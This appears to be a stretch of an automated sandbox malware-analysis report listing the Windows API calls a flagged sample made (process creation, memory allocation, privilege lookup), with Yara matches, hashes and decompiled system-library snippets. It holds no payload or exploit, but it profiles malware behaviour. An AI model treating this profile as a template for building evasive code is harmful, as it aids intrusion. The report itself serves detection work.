                                                              • Opcode Fuzzy Hash: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
                                                              • Instruction Fuzzy Hash: 9590027522504942D50065999804A870109A7D0346F91D411A081459CDC6948871B261
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                                                              • Instruction ID: fc0602712ab44ef66cd6a9bb21d708f89c8d0e17c241f9f71251da78f653e115
                                                              • Opcode Fuzzy Hash: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                                                              • Instruction Fuzzy Hash: 2190027122144502D1407199C44460B5109B7E0342F91C411E0815554CC6558866A361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                              				void* _t7;
                                                              				intOrPtr _t9;
                                                              				intOrPtr _t10;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t13;
                                                              				intOrPtr _t14;
                                                              				intOrPtr* _t15;
                                                              
                                                              				_t13 = __edx;
                                                              				_push(_a4);
                                                              				_t14 =  *[fs:0x18];
                                                              				_t15 = _t12;
                                                              				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                              				_push(_t13);
                                                              				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                              				_t9 =  *_t15;
                                                              				if(_t9 == 0xffffffff) {
                                                              					_t10 = 0;
                                                              				} else {
                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                              				}
                                                              				_push(_t10);
                                                              				_push(_t15);
                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                              				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                              			}











                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                              • API String ID: 885266447-3903918235
                                                              • Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                                                              • Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
                                                              • Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                                                              • Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,030A4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030A4B87,007A002E,00000000,00000060,00000000,00000000), ref: 030A9DAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: f4582175764c561d104e99447b76fc66f0b47ce1304513fa19caea61d2d415bb
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: 51F0B2B2205208ABCB48CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(030A4D42,5EB6522D,FFFFFFFF,030A4A01,?,?,030A4D42,?,030A4A01,FFFFFFFF,5EB6522D,030A4D42,?,00000000), ref: 030A9E55
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: 927f772a32d48b36eb9f496393487392df7a16d534ab1d9bef5dfd3fca86f8d6
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: 11F0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1DA7241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03092D11,00002000,00003000,00000004), ref: 030A9F79
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: c4f91ac108ea786bdf6572a3d8d80db9e01ca9a13952f635bfe9c1bf15fc8403
                                                              • Instruction ID: 43ef156486aa8334da96720ba6830a9f6a102eee6628765ff04c076e927a6fb0
                                                              • Opcode Fuzzy Hash: c4f91ac108ea786bdf6572a3d8d80db9e01ca9a13952f635bfe9c1bf15fc8403
                                                              • Instruction Fuzzy Hash: 3AF0A0B52141496BDB04EF98DC88CE77BA9EF89264B05879DFD4C97202C635E851CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03092D11,00002000,00003000,00000004), ref: 030A9F79
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 4829f3af79cf717780ce4c9f5b9a4c6a6c9298508b4a60c20f72c168b90f8a2c
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: 6DF015B6200208ABCB14DF89DC80EEB77ADEF88650F118148BE08A7241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(030A4D20,?,?,030A4D20,00000000,FFFFFFFF), ref: 030A9EB5
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: c9bf88d3ebf103c50743a87073904bcea18d4248caa37c7eff44a0380944b767
                                                              • Instruction ID: befeea90cc16afd465be0a2beaf3fd58c43647827c749977157236a865061d05
                                                              • Opcode Fuzzy Hash: c9bf88d3ebf103c50743a87073904bcea18d4248caa37c7eff44a0380944b767
                                                              • Instruction Fuzzy Hash: 8FE08C366002146BD710EB98DC84EE77BA9EF48690F118064BA589B281C930E60086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(030A4D20,?,?,030A4D20,00000000,FFFFFFFF), ref: 030A9EB5
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 7e93c3c1586dc32e62788c5f65b8e3d6447254d7f1523b9676fb0f7be54ef1c8
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: 81D012752003146BD710EBD8DC85ED7775CEF44650F154455BA585B241C530F50086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 82c1d116bf81ff76a062c9a70e7fc865745a0cd504fed6c3776a4ca978f5b6ea
                                                              • Instruction ID: 68c9d6d0ddda9a6613a6189202ab7b65739cd40a8753afe4cfc04c2ce027a6e6
                                                              • Opcode Fuzzy Hash: 82c1d116bf81ff76a062c9a70e7fc865745a0cd504fed6c3776a4ca978f5b6ea
                                                              • Instruction Fuzzy Hash: 979002E120200103710571594414616450F9BE0245F61C021E1016590DC565D8917165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 99a1f8c0be40695d669fef42e239862f700d942833d2fcc9bd245eef2995f6fe
                                                              • Instruction ID: 9ba65f17e253b2ed45ba6a4b64e59e89b7399f9c1d42f0f74480f4107091113d
                                                              • Opcode Fuzzy Hash: 99a1f8c0be40695d669fef42e239862f700d942833d2fcc9bd245eef2995f6fe
                                                              • Instruction Fuzzy Hash: FB9002A5211001033105A5590704507054B9BD5395761C021F1017550CD661D8616161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ba25f58cc8bd7aeec908175fd2c81628db104ba06fc51ec061cd6d06a9621daf
                                                              • Instruction ID: 683f05895e0cae19564c1a13b2c1192f2d4679fd46db0a50f2f3829b53c1e5c1
                                                              • Opcode Fuzzy Hash: ba25f58cc8bd7aeec908175fd2c81628db104ba06fc51ec061cd6d06a9621daf
                                                              • Instruction Fuzzy Hash: FC9002B120100943F10061594404B46050A9BE0345F61C016A0126654D8655D8517561
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 06da63b4a439e1b1dd543961866c2e93afc9d808ebe14deb86c276cae370af8b
                                                              • Instruction ID: 564c210ff3ab62329bb272210da25cc24722c4c9481099db53c392fd59640aee
                                                              • Opcode Fuzzy Hash: 06da63b4a439e1b1dd543961866c2e93afc9d808ebe14deb86c276cae370af8b
                                                              • Instruction Fuzzy Hash: BE9002B120108903F1106159840474A050A9BD0345F65C411A4426658D86D5D8917161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3e49502d2fafbaa4297a072411338cdfc7ece53f681031914fa9f0cf658c360e
                                                              • Instruction ID: 1d2cd4151ec653633399664b8b476f0ff7367c281d0ece60fef9226ccf1a7522
                                                              • Opcode Fuzzy Hash: 3e49502d2fafbaa4297a072411338cdfc7ece53f681031914fa9f0cf658c360e
                                                              • Instruction Fuzzy Hash: EE9002B120504943F14071594404A46051A9BD0349F61C011A0066694D9665DD55B6A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03093AF8), ref: 030AA09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,03098CF4,?), ref: 0309F6CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID: s#:q
                                                              • API String ID: 2340568224-1617868548
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0309834A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0309836B
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0309F1A2,0309F1A2,?,00000000,?,?), ref: 030AA200
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030AA134
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0309F1A2,0309F1A2,?,00000000,?,?), ref: 030AA200
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(030A4506,?,030A4C7F,030A4C7F,?,030A4506,?,?,?,?,?,00000000,00000000,?), ref: 030AA05D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,03098CF4,?), ref: 0309F6CB
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0309836B
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              C-Code - Quality: 53%
                                                              			E04CBFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                              				void* _t7;
                                                              				intOrPtr _t9;
                                                              				intOrPtr _t10;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t13;
                                                              				intOrPtr _t14;
                                                              				intOrPtr* _t15;
                                                              
                                                              				_t13 = __edx;
                                                              				_push(_a4);
                                                              				_t14 =  *[fs:0x18];
                                                              				_t15 = _t12;
                                                              				_t7 = E04C6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                              				_push(_t13);
                                                              				E04CB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                              				_t9 =  *_t15;
                                                              				if(_t9 == 0xffffffff) {
                                                              					_t10 = 0;
                                                              				} else {
                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                              				}
                                                              				_push(_t10);
                                                              				_push(_t15);
                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                              				return E04CB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                              			}


                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CBFDFA
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CBFE2B
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CBFE01
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                              • Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp
                                                              • Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                              • API String ID: 885266447-3903918235
                                                              • Opcode ID: 00b1c2531350e568104bbbfc5b028b64a0a48d871a2a4757616cd294ceff6590
                                                              • Instruction ID: e96a07f5b6d2fa3330e32e0dfaf9dbb166be1e070a4e128b31caa5aae92a23d4
                                                              • Opcode Fuzzy Hash: 00b1c2531350e568104bbbfc5b028b64a0a48d871a2a4757616cd294ceff6590
                                                              • Instruction Fuzzy Hash: D2F0F636240241BFE6211E45DC02F73BB6BEB45734F144314F668661E1EA62F930A7F4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%